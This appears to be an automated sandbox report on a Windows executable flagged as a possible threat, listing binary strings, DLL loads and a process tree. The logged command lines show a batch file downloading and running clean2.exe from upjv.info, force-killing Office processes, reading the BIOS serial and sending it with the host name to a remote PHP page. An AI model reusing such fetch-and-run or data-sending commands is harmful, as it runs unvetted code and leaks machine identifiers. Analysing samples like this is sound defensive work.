Source: ariac.exe String found in binary or memory: dht-listen-addr6
Source: ariac.exe String found in binary or memory: --stop=SEC Stop application after SEC seconds has passed. If 0 is given, this feature is disabled.
Source: ariac.exe String found in binary or memory: --stop-with-process=PID Stop application when process PID is not running. This is useful if aria2 process is forked from a parent process. The parent process can fork aria2
Source: ariac.exe String found in binary or memory: this option sets the command to be executed after download completed but before seeding. See --on-download-start option for the requirement of COMMAND.
Source: ariac.exe String found in binary or memory: -h, --help[=TAG|KEYWORD] Print usage and exit. The help messages are classified with tags. A tag starts with "#". For example, type "--help=#http" to get the usage f
Source: ariac.exe String found in binary or memory: -h, --help[=TAG|KEYWORD] Print usage and exit. The help messages are classified with tags. A tag starts with "#". For example, type "--help=#http" to get the usage f
Source: ariac.exe String found in binary or memory: GID#%s Stop downloading torrent due to --bt-stop-timeout option.
Source: ariac.exe String found in binary or memory: --on-download-complete=COMMAND Set the command to be executed after download completed. See --on-download-start option for the requirement of COMMAND.
Source: ariac.exe String found in binary or memory: --on-download-error=COMMAND Set the command to be executed after download aborted due to error. See --on-download-start option for the requirement of COMMAND.
Source: ariac.exe String found in binary or memory: See also --on-download-stop option.
Source: ariac.exe String found in binary or memory: --on-download-start=COMMAND Set the command to be executed after download got started. aria2 passes 3 arguments to COMMAND: GID, the number of files and file path. See Event
Source: ariac.exe String found in binary or memory: See also --on-download-stop option.
Source: ariac.exe String found in binary or memory: --on-download-pause=COMMAND Set the command to be executed after download was paused. See --on-download-start option for the requirement of COMMAND.
Source: ariac.exe String found in binary or memory: download-complete and --on-download-error. If they are specified, command specified in this option is not executed. See --on-download-start option for the
Source: ariac.exe String found in binary or memory: --on-download-stop=COMMAND Set the command to be executed after download stopped. You can override the command to be executed for particular download result using --on
Source: ariac.exe String found in binary or memory: --bt-stop-timeout=SEC Stop BitTorrent download if download speed is 0 in consecutive SEC seconds. If 0 is given, this feature is disabled.
Source: ariac.exe String found in binary or memory: on-download-start
Source: ariac.exe String found in binary or memory: on-download-stop
Source: ariac.exe String found in binary or memory: --dht-listen-addr6=ADDR Specify address to bind socket for IPv6 DHT. It should be a global unicast IPv6 address of the host.
Source: clean.exe String found in binary or memory: clean/Zip/App/AppInfo/Launcher/splash.jpg
Source: clean.exe String found in binary or memory: clean/Zip/Other/Source/LauncherLicense.txt
Source: clean.exe String found in binary or memory: clean/Zip/App/AppInfo/Launcher/Custom.nsh
Source: clean.exe String found in binary or memory: clean/Zip/App/AppInfo/Launcher/7-ZipPortable.ini
Source: clean.exe String found in binary or memory: clean/Zip/App/AppInfo/Launcher
Source: clean.exe String found in binary or memory: p/App/AppInfo/Launcher/7-ZipPortable.ini
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: on-download-start
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: on-download-stop
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: dht-listen-addr
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: dht-listen-addr6
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: bt-stop-timeout
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: GID#%s Stop downloading torrent due to --bt-stop-timeout option.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: BtSetup.ccInitializing LpdMessageReceiver.LpdMessageReceiver initialized. multicastAddr=%s:%u, localAddr=%sLpdMessageReceiver not initialized.Initializing LpdMessageDispatcher.basic_string::_M_construct null not validLpdMessageDispatcher initialized.LpdMessageDispatcher not initialized.239.192.152.143N@GID#%s Stop downloading torrent due to --bt-stop-timeout option.BtStopDownloadCommand.ccbasic_string::_M_construct null not valid&?basic_string::appendinfo_hash=%s&peer_id=%s&uploaded=%lld&downloaded=%lld&left=%lld&compact=1&key=%s&numwant=%d&no_peer_id=1&port=%u&event=&trackerid=&supportcrypto=1&requirecrypto=1&ip=DefaultBtAnnounce.ccNow processing tracker response.Tracker returned null data.Tracker returned failure reason: %sTracker returned warning message: %sTracker ID:%sInterval:%ldMin interval:%ldComplete:%dIncomplete:%dNo peer list received.No peers6 received.vector::_M_realloc_insertipportNow processing UDP tracker response.basic_string::_M_construct null not validDefaultPeerStorage.ccuniqPeers_.size() == unusedPeers_.size() + usedPeers_.size()CUID#%lld is already set for peer %s:%uCheckout peer %s:%u to CUID#%lldRemove peer %s:%ucannot create std::deque larger than max_size()Adding %s:%u is rejected, since unused peer list is full (%lu peers > %lu)Adding %s:%u is rejected because it has been already added.Adding %s:%u is rejected because it is marked bad.Now unused peer list contains %lu peersAdding peer %s:%dPurge %s from bad peerAdded %s as bad peerPeer %s:%u returned from CUID#%lldCannot find peer %s:%u in usedPeers_basic_string::_M_construct null not validCUID#%lld - Name resolution for %s failed:%sDHTEntryPointNameResolveCommand.ccNo address returnedCUID#%lld - Name resolution complete: %s -> %sException caughtcannot create std::deque larger than max_size()Issuing PeerLookup for infoHash=%sDHTGetPeersCommand.cctask finished detectedToo few peers. peers=%lu, max_peers=%d. Try again(%d)DHTNode ID=%s, Host=%s(%u), Condition=%d, RTT=%ldTrying to add node:%sDHTRoutingTable.ccAdding node with the same ID with localnode is not allowed.Added DHTNode.Splitting bucket. Range:%s-%sCached node=%sbasic_string::_M_construct null not validvector::_M_realloc_insertError occurred while binding UDP port for DHTDHTSetup.ccInitialized local node ID=%sNo DHT entry point specified.Exception caught while loading DHT routing table from %sException caught while initializing DHT functionality. DHT is disabled.DHTTaskQueueImpl.ccUpdating periodicTaskQueue1Updating periodicTaskQueue2Updating immediateTaskQueuecannot create std::deque larger than max_size()Token generation failed: ipaddr=%s, port=%uDHTTokenTracker.ccDHTTokenUpdateCommand.ccException caughtDispatching LPD message for infohash=%sLpdDispatchMessageCommand.ccSending LPD message is complete.Sending LPD message %u times but all failed.Could not send LPD message, retry shortly.Failed to send LPD message.basic_string::_M_construct null not validSetting multicast outgoing interface=%sLpdMessageDispatcher.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: See --on-download-start option for the
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: See also --on-download-stop option.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: --on-download-start=COMMAND Set the command to be executed after download
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: --on-download-stop=COMMAND Set the command to be executed after download
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: --stop=SEC Stop application after SEC seconds has passed.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: --stop-with-process=PID Stop application when process PID is not running.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: --bt-stop-timeout=SEC Stop BitTorrent download if download speed is 0 in
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: --dht-listen-addr6=ADDR Specify address to bind socket for IPv6 DHT.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: number to listen on. See also --dht-listen-addr6
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: -h, --help[=TAG|KEYWORD] Print usage and exit.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: -h, --help[=TAG|KEYWORD] Print usage and exit.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: starts with "#". For example, type "--help=#http"
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: starts with "#". For example, type "--help=#http"
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: See also --on-download-stop option. --on-download-error=COMMAND Set the command to be executed after download
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: See also --on-download-stop option. --on-download-pause=COMMAND Set the command to be executed after download
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: requirement of COMMAND. --on-download-start=COMMAND Set the command to be executed after download
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: Hook in man page for more details. --on-download-stop=COMMAND Set the command to be executed after download
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: otherwise printed in stdout to stderr. --stop=SEC Stop application after SEC seconds has passed.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: If 0 is given, this feature is disabled. --stop-with-process=PID Stop application when process PID is not running.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: See also --bt-metadata-only option. --bt-stop-timeout=SEC Stop BitTorrent download if download speed is 0 in
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: network. --dht-file-path=PATH Change the IPv4 DHT routing table file to PATH. --dht-file-path6=PATH Change the IPv6 DHT routing table file to PATH. --dht-listen-addr6=ADDR Specify address to bind socket for IPv6 DHT.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: if you don't have any preferred protocol. --metalink-version=VERSION The version of the file to download. -v, --version Print the version number and exit., #all -h, --help[=TAG|KEYWORD] Print usage and exit.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: if you don't have any preferred protocol. --metalink-version=VERSION The version of the file to download. -v, --version Print the version number and exit., #all -h, --help[=TAG|KEYWORD] Print usage and exit.
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: %lu.%lu.%lu.%lu.in-addr.arpa
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe String found in binary or memory: CARES_HOSTSSystem\CurrentControlSet\Services\Tcpip\ParametersDatabasePathrares_getaddrinfo.c!hquery->ai->nodestcp%lu.%lu.%lu.%lu.in-addr.arpa%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.ip6.arpaSystem\CurrentControlSet\Services\Tcpip\ParametersDatabasePathrares__sortaddrinfo.ccur != NULLwslay_event.coff <= lenlen == off(size_t)r <= buflen
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24C7.tmp\my_cleaner2.bat" "C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log.txt -o clean.exe http://upjv.info/clean/clean2.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\clean.exe clean.exe -y
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM WINWORD.EXE /T /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM EXCEL.EXE /T /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM SOFFICE.BIN /T /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe \Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe a \Users\user\TMP\cr-20241021-53901.zip \Users\user\TMP\cr-20241021-53901
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic bios get serialnumber
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\more.com more +1 serialnumber.txt
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log2.txt -o result.html "http://upjv.info/clean/entree.php?poste=user-PC^&serial=F2LEUD3EOH"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "http://upjv.info/clean/clean.php?serial=F2LEUD3EOH"
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" http://upjv.info/clean/clean.php?serial=F2LEUD3EOH --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" http://upjv.info/clean/clean.php?serial=F2LEUD3EOH
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20230927232528 -prefsHandle 2208 -prefMapHandle 2200 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee62d03a-b3f3-4839-a2d9-d46293892022} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2434ae6bb10 socket
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 420
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4164 -parentBuildID 20230927232528 -prefsHandle 4628 -prefMapHandle 4620 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82d645db-fc8a-46d4-a6c6-6ecf6ff53d4a} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2435dcb5e10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5136 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5200 -prefMapHandle 5196 -prefsLen 33119 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02166d0c-fa79-4115-8a80-2fad783b6113} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2435db1b910 utility
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24C7.tmp\my_cleaner2.bat" "C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe"" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log.txt -o clean.exe http://upjv.info/clean/clean2.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\clean.exe clean.exe -y Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM WINWORD.EXE /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM EXCEL.EXE /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM SOFFICE.BIN /T /F Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe \Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe a \Users\user\TMP\cr-20241021-53901.zip \Users\user\TMP\cr-20241021-53901 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic bios get serialnumber Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\more.com more +1 serialnumber.txt Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\TMP\cr-20241021-53901\ariac.exe \Users\user\TMP\cr-20241021-53901\ariac.exe -l log2.txt -o result.html "http://upjv.info/clean/entree.php?poste=user-PC^&serial=F2LEUD3EOH" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "http://upjv.info/clean/clean.php?serial=F2LEUD3EOH" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 420 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" http://upjv.info/clean/clean.php?serial=F2LEUD3EOH Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20230927232528 -prefsHandle 2208 -prefMapHandle 2200 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee62d03a-b3f3-4839-a2d9-d46293892022} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2434ae6bb10 socket Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4164 -parentBuildID 20230927232528 -prefsHandle 4628 -prefMapHandle 4620 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82d645db-fc8a-46d4-a6c6-6ecf6ff53d4a} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2435dcb5e10 rdd Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5136 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5200 -prefMapHandle 5196 -prefsLen 33119 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02166d0c-fa79-4115-8a80-2fad783b6113} 1088 "\\.\pipe\gecko-crash-server-pipe.1088" 2435db1b910 utility Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
